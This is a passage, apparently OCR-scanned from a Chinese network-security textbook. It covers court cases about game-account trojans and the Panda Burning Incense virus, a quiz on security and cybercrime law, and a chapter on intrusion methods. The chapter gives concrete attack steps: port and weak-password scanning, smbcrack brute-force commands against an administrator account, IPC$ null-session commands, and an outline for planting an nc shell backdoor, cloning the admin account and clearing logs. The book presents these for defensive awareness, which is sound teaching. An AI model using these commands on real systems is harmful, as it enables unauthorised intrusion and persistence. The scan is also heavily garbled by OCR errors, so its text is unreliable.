任 售后 客户 服务 ,负责 售后 技术 问题 咨询 ,非法 获 利 数 千 元 。 

2008 年 3 月 至 8 月 间 , 张 菜 、 张 某 某 通 过 互联 网 从 严 某 、 陈 某 处 分 别 获取 了 针对 “QQ tE 
夏 ”“ 天 龙 八 部 ”网 络 游戏 的 “温柔 ”盗号 木马 程序 使 用 权 。 张 某 某 雇佣 歼 某 ,以 支付 报酬 的 
方式 为 其 租用 了 网 络 服务 器 ,并 在 计算 机 系统 中 进行 了 相关 设置 ,用 于 存放 所 窃取 的 网 络 游 
戏 账号 和 密码 ,同时 还 提供 其 他 技术 支持 。 为 了 使 该 木马 程序 发 挥 盗号 功能 , 张 某 , 张 某 某 
通过 流量 商 谢 某 等 人 ,分别 将 该 木马 程序 插入 到 网 络 上 各 正常 网 页 , 随 玩家 点 击 而 将 木马 程 
序 植 入 玩家 计算 机 系统 ,在 玩家 登录 网 络 游戏 时 .木马 程序 自动 运行 并 后 台 资 取 *QQ 华夏 ” 
游戏 的 账号 及 密码 共计 427717 组 ; 盗 取 * 天 龙 八 部 ?游戏 的 账号 及 密码 共计 2449591 组 。 
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张 某 将 所 盗 账号 、 密 码 转卖 给 他 人 ,非法 获 利 3 万 元 ; 张 某 某 雇佣 陈 某 按照 其 联系 的 买主 ， 
将 所 盗 账号 、 密 码 转卖 他 人 ,非法 获 利 23 万 元 ; 歼 某 非法 获 利 2 万 元 , 陈 某 非法 获 利 
1 万 元 。 

(3) 案件 判决 

法 院 审理 后 认为 ,被 告 人 吕 某 . 曾 某 为 了 谋取 非法 利益 ,开发 制作 和 提供 用 于 窃取 网 络 
游戏 账号 .密码 的 系列 木马 程序 达 28 款 , 被 告 人 严 某 、 陈 某 明 知 是 盗号 木马 程序 而 予以 代理 
销售 ,被 告 人 丁 某 、 许 某 、 林 某 在 代理 销售 过 程 中 提供 技术 服务 和 帮助 ,上 述 被 告 人 的 行为 情 
节 严 重 , 均 已 构成 提供 侵入 计算 机 信息 系统 程序 罪 , 且 系 共同 犯罪 。 在 共同 犯罪 中 ,作为 木 
马 程序 制作 者 的 吕 某 、 曾 某 和 负责 代理 销售 系列 木马 程序 的 严 某 . 陈 某 起 主要 作用 ,为 主犯 ; 
丁 某 、 许 某 、 林 某 在 代理 销售 系列 木马 程序 犯罪 中 起 次 要 、 辅 助 作 用 ,为 从 犯 。 

法 院 同 时 认为 ,被 告 人 张 某 、 张 某 某 明知 是 盗号 木马 程序 而 通过 购买 取得 使 用 权 后 , 借 
助 他 人 技术 手段 加 以 传播 ,窃取 网 络 游戏 账号 ,密码 数量 巨大 ,情节 严重 ; 被 告 化 某 、 陈 某 
明知 张 某 某 通过 非法 手段 获取 游戏 账号 、 密 码 而 提供 技术 服务 ,情节 严重 ,上 述 被 告 人 的 行 
为 均 已 构成 非法 获取 计算 机 信息 系统 数据 罪 。 在 共同 犯罪 中 , 张 某 某 起 主要 作用 , 系 主犯 ; 
化 某 、 陈 某 受 雇 提 供 帮 助 , 起 次 要 辅助 作 用 , 系 从 犯 。 

鉴于 被 告 人 严 某 、 陈 某 、 林 某 协 助 公安 机 关 抓获 其 他 犯罪 嫌疑 人 ,具有 一 般 立 功 情节 , 依 
法 予以 从 轻 处 罚 。 被 告 人 严 某 具 有 利用 提供 “温柔 "系列 木马 程序 之 便 , 将 其 中 一 款 木马 程 
序 通 过 他 人 传播 到 网 页 上 进而 非法 获取 他 人 数据 的 犯罪 情节 , 故 结合 该 情节 对 其 所 犯 之 罪 
酌情 子 以 从 重 处 罚 。 被 告 人 丁 某 、 许 某 、 林 某 、 歼 某 、 陈 某 在 提供 侵入 计算 机 信息 系统 程序 或 
非法 获取 计算 机 信息 系统 数据 共同 犯罪 中 处 于 从 犯 地 位 ,依法 予以 从 轻 处 罚 ; 被 告 人 曾 某 
案 发 后 主动 退还 全 部 违法 所 得 ,酌情 从 轻 处 罚 ; 被 告 人 丁 某 、 许 某 、 林 某 归 案 后 自愿 认罪 , 确 
有 悔罪 表现 ,适用 缓刑 不 致 再 危害 社会 ,可 以 适用 缓刑 。 

根据 被 告 人 的 犯罪 事实 ,性 质 、 情 节 和 对 社会 的 危害 程度 ,依据 (中 华人 民 共 和 国 刑法 》 
有 关 规定 ,最 后 法 院 判决 如 下 : 以 “提供 侵入 计算 机 信息 系统 程序 罪 ? 判 处 被 告 人 吕 某 有 期 
徒刑 三 年 ,并 处 罚金 人 民 币 20 万 元 ; 判处 被 告 人 曾 某 有 期 徒刑 二 年 六 个 月 ,并 处 罚金 人 民 
币 15 万 元 ; 判处 被 告 人 严 某 有 期 徒刑 二 年 八 个 月 ,并 处 罚金 人 民 币 16 万 元 ; 判处 被 告 人 陈 
某 有 期 徒刑 二 年 ,并 处 罚金 人 民 币 10 万 元 ; 判处 被 告 人 丁 某 有 期 徒刑 一 年 ,缓刑 一 年 ,并 处 
罚金 人 民 币 1 万 元 ; 判处 被 告 人 许 某 有 期 徒刑 六 个 月 ,缓刑 一 年 ,并 处 罚金 人 民 币 8 千 元 ; 
判处 被 告 人 林 某 拘役 六 个 月 ,缓刑 一 年 ,并 处 罚金 人 民 币 5 千 元 。 以 * 非 法 获取 计算 机 信息 
系统 数据 罪 ” 判 处 被 告 人 张 某 有 期 徒刑 二 年 ,并 处 罚金 人 民 币 5 万 元 ; 判处 被 告 人 张 某 某 有 
期 徒刑 二 年 零 六 个 月 ,并 处 罚金 人 民 币 10 万 元 ; 判处 被 告 人 的 某 有 期 徒刑 一 年 零 六 个 月 ， 
并 处 罚金 人 民 币 3 万 元 ; 判处 被 告 人 陈 某 有 期 徒刑 一 年 五 个 月 ,并 处 罚金 人 民 币 2 万 元 。 
判决 对 上 列 被 告 人 的 违法 所 得 予以 追缴 , 供 犯 罪 使 用 的 本 人 财物 予以 没收 ,上 缴 国库 。 

2. 破坏 计算 机 信息 系统 罪案 例 

(1) 案件 简介 

2007 年 9 月 24 日 ,湖北 省 仙桃 市 人 民法 院 公开 开庭 审理 了 备 受 社会 各 界 广泛 关注 的 
被 告 人 李 某 、 王 某 、 张 某 、 雷 某 破坏 计算 机 信息 系统 罪 一 案 。 

(2) 案件 回放 

2004 年 毕业 后 , 李 某 曾 多 次 到 北京 、 广 州 等 地 寻找 IT 方面 的 工作 ,尤其 钟情 于 网 络 安 
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全 公司 ,但 均 未 成 功 。 为 发 泄 不 满 ,同时 抱 着 赚钱 的 目的 , 李 某 开始 编写 病毒 。 

李 某 于 2006 年 10 月 开始 编写 “熊猫 烧香 ”计算 机 病毒 ,并 请 雷 某 对 该 病毒 提 修改 建议 。 

“熊猫 烧香 "病毒 具有 强烈 的 商业 目的 ,可 以 暗中 盗 取 用 户 游戏 账号 .QQ 账号 ,以 供出 
售 获 利 , 同 时 还 可 以 控制 受 感染 的 计算 机 ,将 其 变 为 “僵尸 电脑 ”, 暗 中 访问 一 些 按 访问 流量 
付费 的 网 站 ,从 而 获 利 。 

2006 年 12 月 初 , 李 某 在 互联 网 上 叫卖 该 病毒 ,同时 也 请 王 某 及 其 他 网 友 帮 助 出 售 该 病 
毒 。 随 着 病毒 的 出 售 和 赠送 给 网 友 ,“ 熊 猫 烧香 "病毒 迅速 在 互联 网 上 传播 ,由 此 使 得 自动 链 
接 李 某 个 人 网 站 www. krvkr. com 的 流量 大 幅 上 升 。 王 某 得 知 此 情形 后 ,主动 提出 为 李 某 
卖 “ 流 量 ”, 并 联系 张 某 购买 李 某 网 站 的 流量”, 所 得 收入 由 其 和 李 某 平分 。 为 了 提高 访问 李 
某 网 站 的 速度 ,减少 网 络 拥堵 , 王 某 和 李 某 商量 后 ,由 王 某 化 名 董 某 为 李 某 的 网 站 在 南昌 锋 
讯 网 络 科技 有 限 公司 租用 了 一 个 2GB 内 存 ` 百 兆 独 享 线路 的 服务 器 ,租金 由 李 某 、 王 某 每 月 
各 负担 800 元 。 张 某 购买 李 某 网 站 的 流量 后 ,先后 将 九 个 游戏 木马 挂 在 李 某 的 网 站 上 , 盗 取 
自动 链接 李 某 网 站 的 游戏 玩家 的 “游戏 信封 ,并 将 盗 取 的 “游戏 信封 "进行 出 售 获 利 。 

从 2006 4Ẹ 12 H Æ 2007 年 2 月 , 李 某 共 获 利 145149 元 , 王 某 共 获 利 8 万 元 , 张 某 共 获 
利 1.2 万 元 “熊猫 烧香 "病毒 的 传播 感染 ,严重 影响 了 山西 河北、 辽宁 、 广 东 、 湖 北 、 北 京 、 
上 海天 津 等 省 市 的 众多 单位 和 个 人 的 计算 机 系统 的 正常 运行 。2007 年 2 月 4 日 .5 日 、 
7 日 , 李 某 \ 王 某 、 张 菜 、 雷 某 被 仙桃 市 公安 局 抓获 归案 。 李 某 、 王 某 、 张 某 归案 后 退出 所 得 全 
部 赃款 。 李 某 交 出 “熊猫 烧香 "病毒 专 杀 工具 。 

(3) 案件 判决 

仙桃 市 人 民法 院 审理 后 认为 ,被 告 人 李 某 、 雷 某 故意 制作 计算 机 病毒 ,被 告 人 李 某 、 王 
某 . 张 某 故 意 传播 计算 机 病毒 ,影响 了 众多 计算 机 系统 正常 运行 ,后 果 严 重 ,其 行为 均 已 构成 
破坏 计算 机 信息 系统 罪 ,应 负 刑事 责任 。 被 告 人 李 某 在 共同 犯罪 中 起 主要 作用 ,是 本 案 主 
犯 ,应 当 按 照 其 所 参与 的 全 部 犯罪 处 罚 , 同 时 ,被 告 人 李 某 有 立功 表现 ,依法 可 以 从 轻 处 罚 。 
被 告 人 王 某 、 张 某 、 雷 某 在 共同 犯罪 中 起 次 要 作用 ,是 本 案 从 犯 , 应 当 从 轻 处 罚 。 四 被 告 人 认 
罪 态 度 较 好 ,有 悔罪 表现 , 且 被 告 人 李 某 、 王 某 、 张 菜 能 退出 所 得 全 部 赃款 ,依法 可 以 酌情 从 

最 后 法 院 判决 如 下 : 被 告 人 李 某 犯 破坏 计算 机 信息 系统 罪 .判处 有 期 徒刑 四 年 ; 被 告 
人 王 某 犯 破坏 计算 机 信息 系统 罪 .判处 有 期 徒刑 二 年 六 个 月 ; 被 告 人 张 某 犯 破坏 计算 机 信 
息 系统 罪 ,判处 有 期 徒刑 二 年 ; 被 告 人 雷 某 犯 破坏 计算 机 信息 系统 罪 ,判处 有 期 徒刑 一 年 。 

3. 其 他 相关 的 犯罪 案例 

(1) 利用 “黑客 "技术 ,以 非法 占有 为 目的 ,采取 秘密 手段 在 网 络 上 窃取 公共 财物 (如 偷 
卖 游戏 点 卡 、 充 值 卡 天价 QQ 号 .游戏 装备 等 ) ,数额 巨大 ,其 行为 将 构成 盗窃 罪 。 

(2) 利用 “黑客 "技术 侵入 破坏 他 人 网 站 ,并 以 恢复 网 站 为 条 件 , 向 被 破坏 单位 敲诈 勒 
索 钱 财 ,其 行为 将 构成 敲诈 勒索 罪 。 

(3) 利用 "黑客 ?技术 非法 侵入 他 人 计算 机 , 盗 取 他 人 信息 ,并 利用 这 些 信息 ,采取 隐瞒 
事实 真相 的 方法 骗取 他 人 财物 ,数额 巨大 ,将 构成 诈骗 罪 。 

案例 : 2009 年 3 月 7 日 .8 日 , 余 某 利用 * 灰 铝 子 "木马 软件 ,侵入 辽宁 省 东港 市 昌林 公 
司 总 经 理 韩 某 的 电脑 ,破解 了 密码 ,获取 了 邮箱 地 址 。 并 得 知 韩 某 现在 日 本 , 遂 以 韩 某 的 名 
义 给 昌林 公司 的 工作 人 员 发 电子 邮件 .要求 向 其 事先 以 假名 “ 吴 岩 " 开 好 的 银行 账户 内 汇款 
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ABB 6.2 万 元 。3 月 8 H 16 时 许 , 他 将 昌林 公司 汇 过 来 的 人 民 币 6. 2 万 元 取 走 , 归 为 
己 有 。 

辽宁 省 东港 市 法 院 认为 ,被 告 人 余 某 使 用 木马 软件 ,以 非法 占有 为 目的 ,采取 隐瞒 事实 
真相 的 方法 骗取 他 人 财物 ,数额 巨大 ,已 经 构成 诈骗 罪 , 一 审判 处 有 期 徒刑 四 年 六 个 月 ,并 处 
罚金 人 民 币 1 万 元 。 


习 题 1 


1. CERT 是 计算 机 紧急 响应 小 组 的 英文 缩写 ,世界 各 国 大 都 有 自己 的 CERT, 我 国 的 
CERT 是 ( >). 
A. 互联 网 安全 协会 B. 国家 计算 机 网 络 与 信息 安全 管理 中 心 
C. 公安 部 公共 信息 网 络 安全 监察 局 D. 中 国信 息 安全 产品 测评 认证 中 心 
2. 目前 计算 机 网 络 安全 面临 的 主要 威胁 有 ( Yi 
A. 网 络 通信 协议 缺陷 导致 网 络 易 受 到 攻击 
B. 网 络 安全 管理 意识 不 到 位 ,安全 配置 缺失 
C. 黑客 攻击 
D. 僵尸 网 络 和 木马 病毒 泛滥 
3. TCP 协议 的 三 次 握手 过 程 的 缺陷 , 易 受 到 ( Jia 


A. 中 间 人 攻击 B. SYN 泛 洪 攻击 
C. 劫持 攻击 D. SQL 注入 攻击 
4. 影响 服务 器 安全 性 的 因素 有 ( ys 
A. 服务 器 操作 系统 的 安全 性 B. 服务 器 应 用 软件 的 安全 性 
C. 服务 器 是 否 创 建 了 磁盘 阵列 D. 服务 器 的 运行 环境 


5. 保障 计算 机 网 络 安全 常用 的 措施 有 ( y; 
A. 使 用 防火 墙 拦截 来 自 外 部 的 攻击 
B. 在 网 络 内 部 的 汇聚 层 交 换 机 配置 ACL 规则 ,阻止 病毒 传播 的 报 文 或 攻击 报 文 
C. 使 用 IPS 进行 主动 防御 
D. 安装 防 病毒 和 防 木马 软件 
6. 加 强 服务 器 的 安全 性 ,常用 的 措施 有 ( Je 
A. 服务 最 小 化 原则 ,用 户 权限 最 小 化 原则 
B. 强化 安全 管理 意识 和 落实 数据 备份 制度 
C. 加 强 口 令 管 理 , 杜 绝 弱 口令 的 存在 
D. 及 时 给 系统 和 应 用 程序 打 补丁 ,并 安装 杀 病 毒 和 防 木马 软件 
7. 违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删 
除 、 修 改 、 增 加 的 操作 ,后果 严重 的 ,其 罪名 为 ( Ys 
A. 非法 获取 计算 机 信息 系统 数据 ,非法 控制 计算 机 信息 系统 罪 
B. 非法 侵入 计算 机 信息 系统 罪 
C. 提供 侵入 ,非法 控制 计算 机 信息 系统 程序 工具 罪 
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D. 破坏 计算 机 信息 系统 罪 
8. 故意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 ， 
将 构成 ( )。 
A. 非法 获取 计算 机 信息 系统 数据 ,非法 控制 计算 机 信息 系统 罪 
B. 非法 侵入 计算 机 信息 系统 罪 
C. 提供 侵入 ,非法 控制 计算 机 信息 系统 程序 .工具 罪 


D. 破坏 计算 机 信息 系统 罪 
9. 利用 "黑客 "技术 非法 侵入 他 人 电脑 , 盗 取 他 人 信息 ,并 利用 这 些 信息 ,采取 隐瞒 事实 


真相 的 方法 骗取 他 人 财物 ,数额 巨大 ,将 构成 ( ) 。 


A. Wp) Ë B. 诈骗 罪 
C. 敲诈 勒索 罪 D. 非法 侵入 计算 机 信息 系统 罪 
10. 利用 “黑客 "技术 侵入 破坏 他 人 网 站 ,并 以 恢复 网 站 为 条 件 , 向 被 黑 单位 敲诈 勒索 
钱财 ,其 行为 将 构成 Js 
A. wD B. 诈骗 罪 
C. MEDRE D. 非法 侵入 计算 机 信息 系统 罪 
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网 络 攻击 与 人 侵 的 途径 和 方法 多 种 多 样 ,以 利用 系统 漏洞 或 服务 漏洞 进行 攻击 或 人 侵 
的 居多 。 本 章 以 最 为 简单 的 IPCS$ 远程 连接 进行 人 侵 攻击 为 例 , 说 明 网 络 攻击 与 人 侵 的 基 
本 方法 。 本 章 内 容 意 在 让 网 络 安全 人 员 了 解 网 络 攻击 与 人 侵 的 大 体 途 径 和 方法 ,以 便 更 好 
地 理解 和 明白 应 该 从 哪些 方面 进行 网 络 安全 防范 ,以 及 网 络 安全 防范 的 重要 性 。 


2.1 网 络 安全 扫描 


2.1.1 端口 与 漏洞 扫描 


在 对 远程 目标 主机 进行 攻击 与 人 侵 之 前 ,攻击 者 通常 会 对 网 络 进行 安全 扫描 检查 ,比如 
扫描 目标 主机 所 开放 的 端口 和 漏洞 ,以 了 解 目标 主机 所 开放 的 端口 和 服务 .操作 系统 类 型 与 
版 本 号 .可 能 存在 的 各 种 漏洞 以 及 可 能 存在 的 弱 口 令 账 户 等 信息 。 

对 目标 主机 端口 和 漏洞 的 扫描 ,可 使 用 流光 (Fluxay,www. netxeyes. com) 工 具 软 件 来 
实现 。 流 光 工具 软件 的 主 界面 如 图 2.1 Pr 28. 
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图 2.1 流光 工具 软件 的 主 界面 
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网 络 安全 管理 人 员 也 可 使 用 该 软件 对 自己 所 管理 的 服务 器 系统 进行 安全 扫描 ,以 检查 
服务 器 系统 是 否 存在 可 能 被 攻击 者 所 利用 的 漏洞 和 安全 设置 。 

选择 “文件 ”一 “高 级 扫描 向 导 ? 选 项 ,可 打开 如 图 2. 2 所 示 的 对 话 框 。 在 该 对 话 框 中 ,可 
设置 要 扫描 的 目标 主机 网 段 , 要 扫描 的 端口 ( 单 击 “ 全 选 " 按 钮 ,可 选择 全 部 标准 服务 的 端 
口 ) ,然后 单 击 “ 下 一 步 "按钮 ,在 之 后 的 询问 对 话 框 中 ,保持 各 选项 的 默认 状态 ,直接 单 击 “ 下 
一 步 ” 按 钮 。 在 最 后 出 现 的 “选择 流光 主机 ”对 话 框 中 , 单 击 “ 开 始 ”按钮 , 即 可 开始 对 目标 网 
段 的 各 主机 进行 端口 漏洞 和 弱 口 令 账 户 的 扫描 。 


起 烙 地 址 : [192.168.188.2 
结束 地 址 :站 92. 165. 188. 100 


图 2.2 设置 要 扫描 的 目标 主机 范围 和 服务 端口 


扫描 结束 后 ,将 生成 网 页 格式 的 扫描 报告 。 该 报告 详细 地 显示 了 每 个 被 扫描 的 目标 主 
机 的 主机 名 、 操 作 系 统 类 型 数据库 类 型 .所 开放 的 服务 端口 .存在 的 漏洞 .目标 主机 的 用 户 
列表 、 猜 解 出 的 弱 口 令 账户 和 密码 (包括 操作 系统 账户 .FTP 账户 和 数据 库 账户 ) 等 相关 信 
息 。 猜 解 出 的 弱 口 令 账户 和 密码 信息 ,同时 也 会 显示 在 流光 软件 主 界面 底 部 的 列表 框 中 。 

利用 流光 扫描 所 获得 的 目标 主机 的 相关 信息 ,特别 是 用 户 账 户 ,服务 端 口 和 漏洞 信息 ， 
为 攻击 者 选择 攻击 方法 和 入 侵 途 径 提 供 了 重要 的 参考 信息 。 从 中 可 见 ,账户 密 码 为 空 或 密 
码 设置 过 于 简单 ,会 对 系统 构成 严重 的 安全 威胁 。 


2.1.2 用 户 密码 暴力 破解 


在 利用 流光 扫描 软件 获得 目标 主机 的 用 户 列表 之 后 ,攻击 者 若 想 进一步 获得 某 账户 (如 
管理 员 账户 ) 的 密码 , 便 会 采用 暴力 破解 ( 穷 举 法 ) 的 方法 来 尝试 获得 。 该 方法 适合 于 密码 不 
是 很 复杂 的 账户 密码 破解 ,对 于 密码 设置 得 较 复杂 的 账户 ,破解 所 花 的 时 间 较 长 。 因 此 ,为 
提高 系统 的 安全 性 ， EROAREN 些 难度 。 密 码 组 成 字符 最 好 由 大 小 写字 母 .数字 和 
特殊 字符 构成 ,每 一 类 字符 至 少 3 

1. 密码 字典 

在 进行 暴力 破解 之 前 ,应 先生 成 密码 字典 。 密 码 字 典 是 一 个 文本 文件 ,存储 了 各 种 可 能 
的 密码 字符 串 。 在 进行 暴力 破解 时 ,破解 程序 就 从 该 密码 字典 中 ,一 个 一 个 地 试 可 能 的 密 
码 , 直 到 猜 中 为 止 。 

生成 密码 字典 的 工具 软件 主 界面 如 图 2. 3 所 示 。 在 该 界面 中 ,可 设置 密码 字符 的 类 别 
和 密码 的 位 数 , 然 后 单 击 “ 深 度 算法 ”“ 多 线程 深度 算法 ”“ 广 度 算法 ”或 “多 线程 广度 算法 ” 
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Jisan ns == 


中 的 某 一 个 按钮 , 即 可 产生 密码 字典 。 


如 果 构 成 密码 的 字符 类 别 较 多 ,密码 位 数 也 TA 
较 多 , 则 密码 字符 串 的 可 能 性 就 相当 多 ,此 时 生 O | aa 


C BEFAR 


成 密码 字典 将 需要 较 长 的 时 间 , 而 且 所 生成 的 字 EE e rawa] x SE 


PMA 关 退出 程序 | 


典 文件 也 会 相当 大 ,可 达 几 十 GB 或 数 百 GB. 
从 中 可 见 ,增强 密码 的 复杂 性 和 密码 的 位 数 , 可 
预防 账户 密码 被 攻击 者 轻易 破解 。 

2. 密码 的 暴力 破解 

对 密码 进行 暴力 破解 ,可 使 用 小 榕 编写 的 
smbcrack 工具 软件 来 实现 。 该 软件 在 命令 行 运 图 2.3 密码 字典 生成 工具 
行 ,可 用 于 破解 远程 目标 主机 的 指定 账户 的 密 
码 , 其 命令 用 法 为 : 


SMBCrack <target ip> <username > < Password file> 


参数 说 明 : 

target_ip 代表 远程 目标 主机 的 IP 地 址 ; username 代表 远程 目标 主机 上 要 获得 密码 的 
账户 名 称 ; Password file 代表 密码 字典 文件 

假设 要 暴力 破解 IP 地 址 为 192. 168. 6. 73 的 远程 主机 的 administrator 账户 的 密码 , 密 
码 字 典 文件 为 f:\pwd. txt, 则 在 命令 行 执行 以 下 命令 : 


smbcrack 192.168.6.73 administrator f:\pwd. txt 


命令 执行 成 功 后 ,将 显示 如 图 2.4 所 示 的 窗口 ,在 窗口 中 显示 了 当前 的 破解 进度 信息 ， 
若 破 解 成 功 , 则 显示 出 破获 的 密码 ,如 图 2. 5 所 示 


CNWindows\system3a\emd.exe - smbcrack 192.168.6.73 administrator f\pwdbt -| 口 | x| 
SMB Cracker U4-Protype for Fluxay 5, by netXeyes 2002 àl 


Processing Words 82967012356632 1683 Words/Sec 


图 2.4 利用 smbcrack 暴力 破解 账户 密码 


EE C\Windows\system32\cmd.exe loj xj 


Processing Words 6445369712356632 1886 Words/Sec 


F:\snbcrack4> 


图 2.5 暴力 破获 的 密码 


除了 可 利用 smbcrack 工具 进行 密码 暴力 破解 之 外 ,也 可 使 用 LC 5(LOphtCrack) 或 
SAMInside(http://www. insidepro. com/download/saminside. zip) 工 具 软 件 来 对 操作 系统 
的 密码 进行 暴力 破解 。 

LC 5 或 SAMInside 工具 软件 可 根据 操作 系统 的 SAM A SYSTEM 注册 表 文 件 来 进行 
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密码 暴力 破解 。Windows Server 操作 系统 的 密码 明文 采用 HASH 散 列 算法 ,对 密码 加 密 
保存 。 用 户 登 录 进 行 密 码 校 验 时 , 校 验 的 是 密码 的 HASH 值 。 由 于 HASH 算法 是 单 向 的 ， 
不 能 根据 密码 的 HASH 值 反 推出 密码 明文 。 因 此 ,对 Windows 操作 系统 密码 的 破解 ,只 能 
采用 穷 举 法 进行 暴力 破解 。 

操作 系统 的 SAM 和 SYSTEM 注册 表 文 件 位 于 winnt/system32/config 文件 夹 下 ,在 
操作 系统 运行 时 ,由 于 文件 正在 被 Windows 系统 使 用 ,用 户 是 无 法 复制 或 进行 读 写 操 作 的 。 
为 此 ,可 利用 Windows PE 启动 光盘 启动 后 进行 复制 ,或 者 利用 DOS 系统 启动 光盘 进入 
DOS 命令 行 后 进行 复制 。 如 果 系 统 分 区 是 NTFS 格式 , DOS 系统 启动 成 功 后 ,可 运行 
NTFSDOS 软件 后 ,再 进行 复制 。 

如 果 服 务 器 是 本 地 服务 器 ,忘记 了 管理 员 账 户 (administrator) 的 密码 。 有 两 种 解决 办 
法 : 一 是 对 密码 进行 暴力 破解 重新 获得 ,该 方法 仅 适用 于 密码 较 简单 、 位 数 较 少 的 情况 , 否 
则 破解 密码 所 花 的 时 间 较 长 。 二 是 重 置 管理 员 账 户 密码 为 空 , 其 方法 为 : 想 办 法 启动 系统 
到 DOS 命令 行 ,删除 winnt\system32\config 目录 下 的 SAM 文件 ,然后 从 winnt\repair H 
录 下 复制 SAM 文件 到 winnt\system32\config 目录 下 ,重启 操作 系统 后 ,administrator 账 
户 的 密码 就 为 空 了 。 登 录 操作 系统 后 ,重新 设置 administrator 账户 的 密码 即 可 。 


2.2 IPC$ 远程 连接 


2.2.1 IPC$ 简介 


远程 网 络 连接 (Internet Process Connection, IPC) 是 Windows NT/2000/2003/2008 
Server 操作 系统 的 一 项 功能 特性 。 利 用 该 特性 ,两 台 主机 之 间 允 许 利用 IPC $ 建立 起 一 个 
TCP 连接 。 利 用 该 连接 ,可 以 实现 远程 管理 和 对 共享 资源 的 远程 访问 。 

微软 对 于 IPC$ 共享 的 定义 是 : IPCS 共享 通过 使 用 命名 管道 ,在 网 络 通信 的 客户 机 与 
服务 器 之 间 建 立 起 一 个 临时 连接 ,用 于 远程 管理 网 络 服务 器 。 

IPCS$ 是 为 了 让 进程 间 通 信 而 开放 的 命名 管道 ,可 以 通过 验证 用 户 名 和 密码 来 获得 相 
应 的 权限 。 在 建立 连接 时 ,如 果 使 用 空 的 用 户 名 和 密码 所 建立 起 来 的 连接 , 称 为 空 连接 。 空 
连接 相当 于 匿名 访问 ,权限 很 低 ,但 可 枚 举 出 目标 主机 的 用 户 名 列表 。 不 过 ,通过 修改 注册 
表 , 管 理 员 可 禁止 枚 举 出 用 户 列 表 。 在 获得 用 户 列表 后 ,使 用 密码 字典 ,可 进行 密码 探测 ,或 
通过 密码 暴力 破解 ,来 获得 账户 的 密码 。 

IPC $ 不 算是 真正 意义 上 的 漏洞 . 它 是 为 了 方便 管理 员 的 远程 管理 而 开放 的 远程 网 络 
登录 功能 ,Windows 操作 系统 默认 自动 开启 了 该 共享 资源 。 

只 有 Windows NT/2000/2003/2008 和 Windows XP/Vista/7 操作 系统 , 才 支 持 建立 
IPC $ 连接。 

若 目标 主机 未 开启 IPC $ 共享 资源 ,或 者 目标 主机 有 防火 墙 ,禁止 了 TCP 139 或 TCP 445 
端口 , 则 IPC $ 连接 是 无 法 建立 的 。 另 外 ,建立 IPCS$ 连 接 时 , 若 所 使 用 的 账户 权限 较 低 , 则 
入 侵 的 成 功率 也 较 低 。 因 此 ,可 以 通过 防火 墙 封禁 TCP 139 和 TCP 445 端口 ,来 防止 系统 
遭受 到 基于 IPC $ 远程 连接 的 人 侵 攻 击 。 
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2.2.2 IPC $ 远程 连接 入 侵 步 骤 简 介 


为 使 读者 对 利用 IPC $ 远程 连接 进行 人 侵 有 一 个 总 体 的 了 解 和 认识 ,下 面 介绍 一 下 入 
侵 的 基本 步骤 和 方法 , 待 学 习 完 人 侵 所 涉及 的 相关 命令 之 后 ,再 以 案例 的 形式 ,详细 介绍 攻 
击 者 入 侵 基本 方法 。 读 者 在 明白 攻击 者 的 入 侵 方法 后 ,就 可 知道 该 如 何 采 取 对 应 的 安全 防 
范 措施 了 。 

可 以 使 用 流光 软件 来 扫描 查找 到 具有 漏洞 的 主机 。 入 侵 的 基本 步骤 一 般 为 : 获得 目标 
主机 的 信息 ,管理 目标 进程 和 服务 上传 木 马 并 运行 .设置 永久 后 门 、 清 除 访问 日 志 。 

(1) 使 用 流光 软件 扫描 查找 具有 可 利用 的 漏洞 或 弱 口 令 的 主机 作为 攻击 对 象 ,并 进 一 
步 获得 管理 员 账 户 和 对 应 的 密码 。 

(2) 利用 IPC$ 共 享 , 建 立 起 远程 连接 。 

(3) 利用 copy 命令 ,复制 能 开启 远程 shell 的 木马 程序 到 远程 主机 (被 攻击 端 ) 。 

(4) 查询 远程 主机 的 当前 时 间 ,准备 开启 远程 计划 执行 任务 。 

(5) 利用 at 命令 ,在 远程 主机 开启 计划 执行 任务 ,通过 定时 执行 nc 命令 ,开启 远程 主机 
的 Shell 后 门 。 

(6) 利用 nc 命令 或 telnet 命令 登录 远程 主机 ,获得 远程 主机 的 Shell 命令 行 。 

(7) 上 传 木马 并 在 所 获得 的 远程 Shell 中 运行 ,设置 方便 下 次 入 侵 的 永久 后 门 。 根 据 需 
要 ,还 可 进一步 克隆 管理 员 账 户 到 一 个 普通 账户 ,以 方便 以 后 利用 该 普通 账户 建立 远程 连 
接 ,并 获得 管理 员 的 权限 。 

(8) 清除 自己 的 入 侵 日 志 , 从 而 清除 自己 的 访问 痕迹 。 

攻击 者 一 般 只 清除 与 自己 相关 的 访问 日 志 , 不 会 删除 日 志文 件 或 清除 日 志文 件 中 的 全 
部 内 容 , 和 否则 容易 引起 管理 员 的 怀疑 ,并 导致 所 安置 的 后 门 程序 暴露 。 


2.2.3 IPC $ 连接 的 创建 与 管理 


IPC $ 连接 的 创建 与 管理 使 用 net use 命令 来 实现 ,可 以 建立 IPCS$ 空 连接 或 非 空 连接 。 
空 连接 就 是 使 用 空 的 用 户 名 和 空 的 密码 所 建立 起 的 IPC $ 连接 。 

1. 建立 IPC $ 连接 

(1) 建立 IPC$ 空 连接 

命令 : net use \\ip_address\ipc$ "" /user:"" 


例如 ,车 要 与 192. 168. 168. 230 的 远程 主机 建立 空 连接 , 则 实现 命令 为 : 
net use \\192. 168.168. 230\ipc $ "" /user:"" 


(2) # sz IPC $ 非 空 连接 

命令 : net use \\ip_address\ipc$ "password" /user:" username" 

参数 说 明 : username 为 建立 IPC $ 远程 连接 所 使 用 的 账户 名 , password 为 账户 的 
密码 。 

2. IPC $ 连接 的 管理 

(1) 查看 IPCS 连接 情况 

若 要 查看 目前 所 创建 的 IPC $ 连接 情况 ,可 直接 在 命令 行 执行 net use 命 令 查 看 。 
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(2) 将 共享 资源 映射 为 本 地 机 的 网 络 磁盘 

利用 net use 命令 ,还 可 实现 将 共享 资源 映射 为 本 地 机 的 网 络 硬盘 ,以 方便 对 远程 主机 
共享 资源 的 访问 。 

a 在 映射 网 络 磁盘 之 前 ,如 果 已 创建 好 IPC S 连接, 则 映射 命令 为 : 

net use 本 地 盘 符 \\ ip_address\ 共 享 资源 名 


